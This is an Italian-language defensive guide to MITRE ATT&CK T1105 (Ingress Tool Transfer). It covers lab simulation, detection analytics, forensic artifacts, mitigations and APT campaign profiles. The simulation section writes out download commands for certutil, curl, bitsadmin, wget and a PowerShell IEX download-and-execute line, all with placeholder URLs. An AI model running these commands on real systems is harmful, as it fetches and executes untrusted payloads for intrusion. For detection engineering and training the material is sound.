Trasferimento di Strumenti nell'Ambiente Vittima: Ingress Tool Transfer (T1105)

La simulazione dell'Ingress Tool Transfer in laboratorio è fondamentale per validare i controlli di rete e gli alert del SOC. L'obiettivo è verificare se gli strumenti di monitoraggio intercettano il download di payload attraverso utility native e tool offensivi, seguendo gli stessi pattern documentati nei gruppi APT reali.

Il primo scenario sfrutta certutil, uno dei vettori preferiti da gruppi come APT41, Threat Group-3390, Rancor e Medusa Group. In un prompt elevato su Windows, il comando classico è:

certutil -urlcache -split -f <URL-del-payload-in-lab> C:\Users\Public\payload.exe

Subito dopo, molti avversari verificano l'integrità del file scaricato:

certutil -hashfile C:\Users\Public\payload.exe SHA256

Questa coppia di comandi genera eventi Sysmon riconoscibili — creazione processo con command line contenente -urlcache seguita da accesso al file in una directory ad alto rischio.

Il secondo scenario replica il comportamento di Storm-1811 e Daggerfly, che combinano cURL e BITSAdmin. Su Windows 10/11, cURL è preinstallato:

curl -o C:\Users\Public\tool.exe <URL-del-payload-in-lab>

Per BITSAdmin (open source, nativo Windows):

bitsadmin /transfer DownloadJob /download /priority high <URL-del-payload-in-lab> C:\Users\Public\tool.exe

BITSAdmin è particolarmente insidioso perché il servizio BITS gestisce nativamente gli aggiornamenti Windows, mimetizzando il traffico malevolo tra job legittimi.

Su Linux, i pattern di TeamTNT si replicano con:

curl -fsSL <URL-del-payload-in-lab> -o /tmp/miner.sh && chmod +x /tmp/miner.sh

wget -q <URL-del-payload-in-lab> -O /tmp/implant.elf

Per ambienti ESXi, dove gruppi come Scattered Spider hanno operato, i comandi disponibili sono gli stessi wget e curl presenti nella BusyBox dell'hypervisor, ma il percorso di destinazione cambia:

wget <URL-del-payload-in-lab> -O /vmfs/volumes/datastore1/implant

Per testare il trasferimento via PowerShell, come documentato per FIN7, WIRTE e Winter Vivern:

IEX(New-Object Net.WebClient).downloadString('<URL-del-payload-in-lab>')

Invoke-WebRequest -Uri <URL-del-payload-in-lab> -OutFile C:\Users\Public\beacon.exe

Sul fronte dei framework offensivi, Cobalt Strike (a pagamento) offre il comando upload dalla Beacon console, mentre Sliver (open source) espone un equivalente. Brute Ratel C4 (a pagamento) fornisce funzionalità analoghe di file transfer verso host compromessi. Infine, per validare la detection su macOS, replica il pattern di macOS.OSAMiner con curl verso directory ad alto rischio come /Users/Shared/ o /tmp/.

La detection dell'Ingress Tool Transfer si basa su una catena comportamentale: un processo avvia una connessione di rete verso l'esterno, seguito dalla creazione di un file su disco. Non è il singolo evento a fare la differenza, ma la correlazione temporale tra i due.

Su Windows, la sorgente primaria è il log Sysmon. L'analytic DET0060/AN0165 cattura esattamente questo pattern: processi insoliti che aprono connessioni verso destinazioni esterne e poi scrivono file. Il tuning è cruciale — bisogna escludere updater legittimi come ChromeUpdate e OneDrive tramite il campo ParentProcessName e concentrarsi su percorsi di drop sospetti. Le directory *C:\Users\Public*, *C:\ProgramData* e %TEMP% sono le più abusate. I processi da monitorare con priorità alta sono certutil.exe, bitsadmin.exe, powershell.exe, curl.exe e mshta.exe.

Per BITSAdmin, il log dedicato Microsoft-Windows-Bits-Client/Operational registra ogni job BITS con URL sorgente e percorso di destinazione — un canale spesso trascurato che rivela trasferimenti altrimenti invisibili nei log standard.

Su Linux (AN0166), la combinazione di auditd con regole SYSCALL e iptables in modalità LOG intercetta l'esecuzione di curl, wget, scp e rsync seguita dalla creazione di file eseguibili. Il tuning sui tipi di file (.sh, .bin, .elf) riduce il rumore senza sacrificare copertura. In ambienti containerizzati, monitorare queste utility è ancora più critico perché i cluster Kubernetes rappresentano un target documentato per gruppi come TeamTNT.

Su macOS (AN0167), i log Endpoint Security e Unified Log tracciano esecuzione di curl/wget con successiva scrittura in /Users/Shared/ o /tmp/. Il tuning va calibrato sulle attività MDM aziendali per evitare falsi positivi.

Per ambienti ESXi (AN0168), i log hostd e vmkernel rivelano trasferimenti via CLI verso percorsi datastore (/vmfs/volumes/). Qualsiasi uso di wget o curl sull'hypervisor merita indagine immediata poiché è raramente legittimo al di fuori di manutenzione pianificata.

Sui dispositivi di rete (AN0169), flow NSM e syslog SNMP identificano trasferimenti anomali tramite protocolli come TFTP, FTP o HTTP verso apparati che normalmente non ricevono file in modo interattivo. La soglia di volume va tarata sui pattern di aggiornamento firmware legittimi.

Le due mitigazioni ufficiali si integrano nella strategia: Network Intrusion Prevention (M1031) con firme IDS/IPS per traffico C2 noto, e Filter Network Traffic (M1037) con blocco del traffico in uscita verso destinazioni non autorizzate, segmentazione di rete e filtraggio applicativo tramite WAF e proxy. Combinare firme di rete con la detection comportamentale endpoint copre sia i tool noti che le varianti custom.

La ricostruzione forense di un Ingress Tool Transfer parte dall'identificazione del momento esatto in cui un file estraneo ha toccato il disco — o la memoria — del sistema compromesso. Il punto di forza dell'analista è la correlazione tra artefatti di rete e artefatti filesystem per costruire una timeline che leghi il download all'esecuzione.

Su Windows, gli artefatti principali sono molteplici e complementari. La MFT ($MFT) registra la creazione di ogni file con timestamp $SI_Created e $FN_Created; discrepanze tra questi due valori (timestomping) segnalano manipolazione intenzionale. Per i download via browser o utility native, la Zone.Identifier nel flusso ADS :Zone.Identifier preserva l'URL sorgente e il ReferrerUrl — una prova diretta dell'origine esterna del file. I Prefetch (in *C:\Windows\Prefetch*) registrano l'esecuzione di certutil.exe, bitsadmin.exe o powershell.exe con timestamp e riferimenti ai file acceduti durante i primi 10 secondi di esecuzione.

Per i trasferimenti via BITS, il database BITS Queue (file qmgr0.dat e qmgr1.dat in *%ALLUSERSPROFILE%\Microsoft\Network\Downloader*) conserva lo storico dei job inclusi URL sorgente e percorso locale di destinazione, anche dopo il completamento. Lo strumento BitsParser (open source) del SANS DFIR toolkit permette di estrarre questi record.

I log Sysmon sono centrali: EventCode 1 (process creation) cattura la command line completa, EventCode 3 (network connection) registra IP di destinazione e porta, EventCode 11 (file create) conferma la scrittura su disco. La correlazione di questi tre eventi per lo stesso ProcessGuid ricostruisce la catena download-scrittura in modo deterministico.

Su Linux, i record auditd di tipo SYSCALL con execve tracciano l'invocazione di curl, wget e scp con tutti gli argomenti. Il log iptables in modalità LOG completa il quadro con IP di destinazione e porta. Il filesystem /tmp/ e le home directory degli utenti di servizio sono i primi percorsi da ispezionare. I timestamp mtime, atime e ctime (ottenibili con stat) aiutano la ricostruzione, mentre i metadati ext4 nel journal possono recuperare tracce di file cancellati.

Su macOS, il database KnowledgeC e gli FSEvents registrano la creazione di file con granularità utile alla timeline. La quarantine database (com.apple.LaunchServices.QuarantineEventsV2) traccia i file scaricati con URL di origine — un equivalente macOS della Zone.Identifier Windows.

Le campagne forniscono pattern forensi ricorrenti. Nella campagna APT41 DUST (C0040), l'esecuzione di certutil.exe via web shell per scaricare il dropper DUSTPAN lascia artefatti in Prefetch, nei log IIS della web shell e nella MFT. Durante Water Curupira Pikabot Distribution (C0037), curl.exe scriveva il payload nella directory temporanea — un pattern intercettabile correlando Sysmon EventCode 1 con EventCode 11. Nella SolarWinds Compromise (C0024), APT29 scaricava TEARDROP e Cobalt Strike dopo l'accesso iniziale, con artefatti distribuiti tra log DNS, connessioni di rete e file su percorsi non standard.

Tool come KAPE (open source di Kroll) per la raccolta rapida di artefatti Windows e Velociraptor (open source) per acquisizioni remote su larga scala permettono di centralizzare le evidenze. Chainsaw (open source) consente di analizzare i log EVTX direttamente, cercando pattern di command line associati a download malevoli.

Con 85 gruppi che utilizzano questa tecnica, l'Ingress Tool Transfer è un denominatore comune trasversale a teatri operativi, motivazioni e livelli di sofisticazione. L'analisi dei pattern di utilizzo rivela però differenze significative che aiutano nella profilazione.

APT41 rappresenta l'esempio più completo di evoluzione nell'uso di questa tecnica. Nella campagna C0017, il gruppo ha compromesso almeno sei reti governative statunitensi scaricando payload post-exploitation sui sistemi compromessi. Nella più recente APT41 DUST (C0040), il pattern si è affinato: esecuzione di certutil.exe tramite web shell per scaricare il dropper DUSTPAN, seguita dal deployment di tool nuovi come DUSTTRAP accanto a malware già noti. Questa doppia campagna documenta come APT41 mantenga la stessa tecnica di trasferimento evolvendone i payload, un segnale che l'infrastruttura di distribuzione è consolidata.

APT29 mostra un pattern analogo di persistenza tecnica su scala temporale ancora più ampia. Dalla campagna C0021 (spearphishing del 2018 contro organizzazioni governative e ONG) alla SolarWinds Compromise (C0024), il gruppo ha costantemente scaricato tool aggiuntivi — inclusi Cobalt Strike e TEARDROP — sugli host compromessi dopo l'accesso iniziale. La supply chain compromise della SolarWinds ha elevato il livello di sofisticazione del vettore di consegna, ma la fase di tool transfer post-accesso è rimasta concettualmente identica.

Il cluster iraniano offre una prospettiva geografica interessante. Fox Kitten scarica PsExec direttamente sugli endpoint, Magic Hound trasferisce codice aggiuntivo dai propri server, OilRig ha operato nella campagna Outer Space (C0042) utilizzando il downloader SampleCheck5000 e la backdoor Solar contro organizzazioni israeliane. MuddyWater completa il quadro con upload di file aggiuntivi via malware custom. Questo schema distribuito — più gruppi iraniani con tool diversi ma la stessa tecnica fondamentale — suggerisce una dottrina operativa condivisa piuttosto che una sovrapposizione di capability.

Il panorama nordcoreano vede Lazarus Group particolarmente attivo, documentato nelle campagne Operation Dream Job (C0022) e Operation Sharpshooter (C0013) con download di malware multistadio. Kimsuky e Andariel completano il trittico con pattern di download di script e tool aggiuntivi su sistemi già compromessi.

Sul fronte cybercriminale, la campagna Water Curupira Pikabot Distribution (C0037) illustra come anche gli operatori ransomware adottino questa tecnica in modo strutturato, usando curl.exe per scaricare payload Pikabot da server esterni. Scattered Spider nella campagna C0027 ha scaricato tool come Teleport su server VMware vCenter, dimostrando l'estensione dell'Ingress Tool Transfer verso infrastrutture di virtualizzazione. INC Ransom e BlackByte confermano il trend con download di tool come Advanced IP Scanner e Cobalt Strike da siti di file sharing.

Un trend emergente riguarda lo sfruttamento di servizi cloud legittimi come canale di trasferimento. Software come CreepyDrive, OilBooster e OilCheck utilizzano OneDrive come piattaforma di staging, rendendo il traffico di download indistinguibile dall'uso aziendale legittimo del cloud storage — una sfida significativa per le strategie di filtraggio basate su reputazione dei domini.

Framework MITRE ATT&CK v16 — Tecnica T1105, Tattica TA0011. Campagne: C0004, C0042, C0022, C0027, C0040, C0001, C0037, C0015, C0035, C0048, C0028, C0029, C0055, C0021, C0007, C0045, C0026, C0024, C0010, C0013, C0006, C0038, C0056, C0018, C0058, C0002, C0014, C0017. Mitigazioni: M1031, M1037. Detection: DET0060. Integrato con conoscenza professionale per tool e procedure operative.